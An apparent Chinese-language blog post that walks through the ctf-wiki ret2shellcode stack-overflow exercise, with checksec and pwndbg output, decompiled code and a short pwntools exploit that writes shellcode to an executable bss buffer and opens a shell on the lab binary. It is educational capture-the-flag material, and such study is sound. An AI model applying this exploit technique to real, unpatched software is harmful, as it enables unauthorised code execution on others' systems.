<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="ret2shellcode原理ret2shellcode，即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码。 在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运">
<meta property="og:type" content="article">
<meta property="og:title" content="从ret2shellcode入坑栈溢出">
<meta property="og:url" content="https://github.com/s0nnse/2020/05/31/%E4%BB%8Eret2shellcode%E5%85%A5%E5%9D%91%E6%A0%88%E6%BA%A2%E5%87%BA/index.html">
<meta property="og:site_name" content="s0nnse">
<meta property="og:description" content="ret2shellcode原理ret2shellcode，即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码。 在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-05-31T12:12:30.000Z">
<meta property="article:modified_time" content="2020-06-01T14:02:56.154Z">
<meta property="article:author" content="s0nnse">
<meta property="article:tag" content="PWN">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://github.com/s0nnse/2020/05/31/%E4%BB%8Eret2shellcode%E5%85%A5%E5%9D%91%E6%A0%88%E6%BA%A2%E5%87%BA/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>从ret2shellcode入坑栈溢出 | s0nnse</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">s0nnse</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://github.com/s0nnse/2020/05/31/%E4%BB%8Eret2shellcode%E5%85%A5%E5%9D%91%E6%A0%88%E6%BA%A2%E5%87%BA/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="s0nnse">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="s0nnse">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          从ret2shellcode入坑栈溢出
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-05-31 20:12:30" itemprop="dateCreated datePublished" datetime="2020-05-31T20:12:30+08:00">2020-05-31</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-06-01 22:02:56" itemprop="dateModified" datetime="2020-06-01T22:02:56+08:00">2020-06-01</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h4 id="ret2shellcode原理"><a href="#ret2shellcode原理" class="headerlink" title="ret2shellcode原理"></a>ret2shellcode原理</h4><p>ret2shellcode，即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码。</p>
<p>在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运行时，shellcode 所在的区域具有可执行权限。</p>
<p>栈溢出的基本概念在ret2text中介绍过，这里不再重复，直接分析一个程序。</p>
<h4 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h4><p>以<a href="https://ctf-wiki.github.io/ctf-wiki/pwn/readme-zh/" target="_blank" rel="noopener">ctf-wiki</a>中的ret2shellcode程序为例，主要内容与ctf-wiki一致，其中穿插补充一些学习中所遇到的疑惑点。</p>
<p>首先常规的先检测程序开启的保护</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">kali@kali:~/PWN$ checksec --file=ret2shellcode</span><br><span class="line">[*] '/home/kali/PWN/ret2shellcode'</span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX disabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br><span class="line">    RWX:      Has RWX segments</span><br></pre></td></tr></table></figure>

<p>可以看到是一个32位程序，而且几乎没有开启任何保护，丢进IDA看一下。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+1Ch] [ebp-64h]</span></span><br><span class="line"></span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"No system for you this time !!!"</span>);</span><br><span class="line">  gets(&amp;s);</span><br><span class="line">  <span class="built_in">strncpy</span>(buf2, &amp;s, <span class="number">0x64</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"bye bye ~"</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>简单查看，可以看到输入数据读到s变量中，再复制到buf2处，这里因为代码里没有自带的system等获取shell的函数，所以不能使用ret2text，需要自己写入调用的函数。</p>
<p>这里先引入一下内存分配区域的知识</p>
<p>32位操作系统下为：1G内核态，3G用户态</p>
<p>BSS段 ：通常是指用来存放程序中未初始化的全局变量、静态变量（全局变量未初始化时默认为0）的一块内存区域</p>
<p>数据段（data） ：通常是指用来存放程序中 初始化后的全局变量和静态变量</p>
<p>代码段（text） ：通常是指用来存放程序中 代码和常量</p>
<p>堆（heap） ：通常是指用来存放程序中进程运行时被动态分配的内存段 ( 动态分配：malloc / new，者动态释放：free / delete)</p>
<p>栈 （stack）：通常是指用来存放程序中用户临时创建的局部变量、函数形参、数组（局部变量未初始化则默认为垃圾值）也就是说我们函数括弧“{}”中定义的变量（但不包括static声明的变量，static意味着在数据段中存放变量）。除此以外，在函数被调用时，其参数也会被压入发起调用的进程栈中，并且待调用结束后，函数的返回值也会被存放回栈中。由于栈的先进后出特点，所以栈特别方便用来保存/恢复调用现场。从这个意义上讲，我们可以把堆栈看成一个寄存、交换临时数据的内存区。它是由操作系统分配的，内存的申请与回收都由OS管理。</p>
<p>这里有个疑惑，s变量读入了数据，为什么不把shellcode直接写入s变量所在的空间执行，反而要多走一步到bss段再执行。变量s是保存在栈中的，而且NX disabled栈保护是关闭的。<strong>难道是因为s对应的地址是未知的？，留坑，没完全明白。</strong></p>
<p>接下来在IDA中通过双击buf2，查看buf2的信息。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">.bss:0804A080 ; char buf2[100]</span><br><span class="line">.bss:0804A080 buf2            db 64h dup(?)           ; DATA XREF: main+7B↑o</span><br><span class="line">.bss:0804A080 _bss            ends</span><br></pre></td></tr></table></figure>

<p>查看可知buf2在bss段，有100个字节空间长度，在解释一下<code>db 64h dup(?)</code>的含义。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">db： 定义字节类型变量的伪指令</span><br><span class="line">dup()： 重复定义圆括号中指定的初值，次数由前面的数值决定</span><br><span class="line">?： 只分配存储空间，不指定初值</span><br></pre></td></tr></table></figure>

<p>接下来简单调试下程序，看看这里的bss段是否可以执行。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">pwndbg: loaded 192 commands. Type pwndbg [filter] for a list.</span><br><span class="line">pwndbg: created $rebase, $ida gdb functions (can be used with print/break)</span><br><span class="line">Reading symbols from ret2shellcode...</span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> b main</span></span><br><span class="line">Breakpoint 1 at 0x8048536: file ret2shellcode.c, line 8.</span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> r</span></span><br><span class="line">Starting program: /home/kali/PWN/ret2shellcode </span><br><span class="line"></span><br><span class="line">Breakpoint 1, main () at ret2shellcode.c:8</span><br><span class="line">8       ret2shellcode.c: No such file or directory.</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">────────────────────────────────────[ REGISTERS ]─────────────────────────────────────</span><br><span class="line"> EAX  0xf7fb6808 (environ) —▸ 0xffffd39c —▸ 0xffffd531 ◂— 'SHELL=/bin/bash'</span><br><span class="line"> EBX  0x0</span><br><span class="line"> ECX  0x4e9a5ff3</span><br><span class="line"> EDX  0xffffd324 ◂— 0x0</span><br><span class="line"> EDI  0xf7fb4000 ◂— insb   byte ptr es:[edi], dx /* 0x1dfd6c */</span><br><span class="line"> ESI  0xf7fb4000 ◂— insb   byte ptr es:[edi], dx /* 0x1dfd6c */</span><br><span class="line"> EBP  0xffffd2f8 ◂— 0x0</span><br><span class="line"> ESP  0xffffd270 —▸ 0xf7f5bc92 ◂— pop    edi /* '__vdso_clock_gettime' */</span><br><span class="line"> EIP  0x8048536 (main+9) ◂— mov    eax, dword ptr [0x804a060]</span><br><span class="line">──────────────────────────────────────[ DISASM ]──────────────────────────────────────</span><br><span class="line"> ► 0x8048536 &lt;main+9&gt;     mov    eax, dword ptr [0x804a060]</span><br><span class="line">    ↓</span><br><span class="line">   0x8048543 &lt;main+22&gt;    mov    dword ptr [esp + 8], 2</span><br><span class="line">   0x804854b &lt;main+30&gt;    mov    dword ptr [esp + 4], 0</span><br><span class="line">   0x8048553 &lt;main+38&gt;    mov    dword ptr [esp], eax</span><br><span class="line">   0x8048556 &lt;main+41&gt;    call   setvbuf@plt &lt;0x8048410&gt;</span><br><span class="line"> </span><br><span class="line">   0x804855b &lt;main+46&gt;    mov    eax, dword ptr [stdin@@GLIBC_2.0] &lt;0x804a040&gt;</span><br><span class="line">   0x8048560 &lt;main+51&gt;    mov    dword ptr [esp + 0xc], 0</span><br><span class="line">   0x8048568 &lt;main+59&gt;    mov    dword ptr [esp + 8], 1</span><br><span class="line">   0x8048570 &lt;main+67&gt;    mov    dword ptr [esp + 4], 0</span><br><span class="line">   0x8048578 &lt;main+75&gt;    mov    dword ptr [esp], eax</span><br><span class="line">   0x804857b &lt;main+78&gt;    call   setvbuf@plt &lt;0x8048410&gt;</span><br><span class="line">──────────────────────────────────────[ STACK ]───────────────────────────────────────</span><br><span class="line">00:0000│ esp  0xffffd270 —▸ 0xf7f5bc92 ◂— pop    edi /* '__vdso_clock_gettime' */</span><br><span class="line">01:0004│      0xffffd274 —▸ 0xf7ffdc40 —▸ 0xf7fd3000 ◂— jg     0xf7fd3047</span><br><span class="line">02:0008│      0xffffd278 —▸ 0xffffd298 —▸ 0xf7fb4000 ◂— insb   byte ptr es:[edi], dx /* 0x1dfd6c */</span><br><span class="line">03:000c│      0xffffd27c —▸ 0xf7ffde14 —▸ 0xf7ffdda0 —▸ 0xf7ffdc54 —▸ 0xf7ffdc40 ◂— ...</span><br><span class="line">04:0010│      0xffffd280 —▸ 0xffffd2d0 ◂— 0x1</span><br><span class="line">05:0014│      0xffffd284 ◂— 0x0</span><br><span class="line">06:0018│      0xffffd288 —▸ 0xf7ffd000 ◂— and    al, 0x8f /* 0x28f24 */</span><br><span class="line">07:001c│      0xffffd28c ◂— 0x0</span><br><span class="line">────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────</span><br><span class="line"> ► f 0  8048536 main+9</span><br><span class="line">   f 1 f7df2ef1 __libc_start_main+241</span><br><span class="line">──────────────────────────────────────────────────────────────────────────────────────</span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> vmmap</span></span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line"> 0x8048000  0x8049000 r-xp     1000 0      /home/kali/PWN/ret2shellcode</span><br><span class="line"> 0x8049000  0x804a000 r-xp     1000 0      /home/kali/PWN/ret2shellcode</span><br><span class="line"> 0x804a000  0x804b000 rwxp     1000 1000   /home/kali/PWN/ret2shellcode</span><br><span class="line">0xf7dd4000 0xf7fb2000 r-xp   1de000 0      /usr/lib32/libc-2.30.so</span><br><span class="line">0xf7fb2000 0xf7fb4000 r-xp     2000 1dd000 /usr/lib32/libc-2.30.so</span><br><span class="line">0xf7fb4000 0xf7fb6000 rwxp     2000 1df000 /usr/lib32/libc-2.30.so</span><br><span class="line">0xf7fb6000 0xf7fb8000 rwxp     2000 0      </span><br><span class="line">0xf7fce000 0xf7fd0000 rwxp     2000 0      </span><br><span class="line">0xf7fd0000 0xf7fd3000 r--p     3000 0      [vvar]</span><br><span class="line">0xf7fd3000 0xf7fd4000 r-xp     1000 0      [vdso]</span><br><span class="line">0xf7fd4000 0xf7ffc000 r-xp    28000 0      /usr/lib32/ld-2.30.so</span><br><span class="line">0xf7ffc000 0xf7ffd000 r-xp     1000 27000  /usr/lib32/ld-2.30.so</span><br><span class="line">0xf7ffd000 0xf7ffe000 rwxp     1000 28000  /usr/lib32/ld-2.30.so</span><br><span class="line">0xfffdd000 0xffffe000 rwxp    21000 0      [stack]</span><br></pre></td></tr></table></figure>

<p>在main函数处下断点，通过vmmap<code>#查看进程中的权限</code>。</p>
<p>buf2地址为0x0804A080，落在</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x804a000  0x804b000 rwxp     1000 1000   /home/kali/PWN/ret2shellcode</span><br></pre></td></tr></table></figure>

<p>中，所以可以看到bss段具有可执行的权限</p>
<p>那么这次我们就控制程序执行 shellcode，也就是读入 shellcode，然后控制程序执行 bss 段处的 shellcode。其中，相应的偏移计算类似于 ret2text 中的例子。需要额外注意的是最后payload的组成应该是<code>payload = shellcode + 垃圾填充字符 + 要跳转地址（这里是bss段shellcode的地址）</code>。这里的buf2地址为0x0804A080，所以的返回地址（retaddr）就是是0x0804A080。</p>
<p>编写相应的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">"./ret2shellcode"</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">buf2_addr = <span class="number">0x804a080</span></span><br><span class="line">sh.sendline(shellcode.ljust(<span class="number">112</span>, <span class="string">b'A'</span>) + p32(buf2_addr))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>代码中<code>asm(shellcraft.sh())</code>是生成一个shellcode，<code>shellcode.ljust(112, b&#39;A&#39;)</code>是若生成的shellcode长度若不够112个，则用垃圾字符填充。</p>
<p>执行代码成功获取shell</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kali@kali:~/PWN$ python3 ret2shellcode.py </span><br><span class="line">[+] Starting local process './ret2shellcode': pid 1901</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">No system for you this time !!!</span><br><span class="line">bye bye ~$ ls</span><br><span class="line">pwndbg    ret2shellcode  ret2shellcode.py  ret2text  ret2text.py</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/PWN/" rel="tag"># PWN</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/05/31/%E4%BB%8Eret2text%E5%85%A5%E5%9D%91%E6%A0%88%E6%BA%A2%E5%87%BA/" rel="prev" title="从ret2text入坑栈溢出">
      <i class="fa fa-chevron-left"></i> 从ret2text入坑栈溢出
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/06/01/%E4%BB%8Eret2syscall%E5%85%A5%E5%9D%91%E6%A0%88%E6%BA%A2%E5%87%BA/" rel="next" title="从ret2syscall入坑栈溢出">
      从ret2syscall入坑栈溢出 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2shellcode原理"><span class="nav-number">1.</span> <span class="nav-text">ret2shellcode原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#实例"><span class="nav-number">2.</span> <span class="nav-text">实例</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">s0nnse</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">s0nnse</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
